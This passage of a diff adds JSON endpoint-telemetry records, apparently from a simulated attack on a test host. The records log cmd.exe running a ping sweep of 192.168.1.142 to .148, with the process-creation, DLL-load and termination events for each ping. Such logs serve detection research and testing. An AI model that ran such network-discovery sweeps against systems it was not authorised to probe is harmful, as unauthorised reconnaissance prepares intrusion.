"C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "process", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572676830000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.142", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "process", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572681990000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.143", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2908, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572682130000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "process", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572686830000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.144", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4956, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "process", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572691990000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.145", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572692130000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "process", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572696830000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.146", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3324, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572697029984, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "process", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572701990000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.147", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4548, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "process", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572706830000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.148", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572706990000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 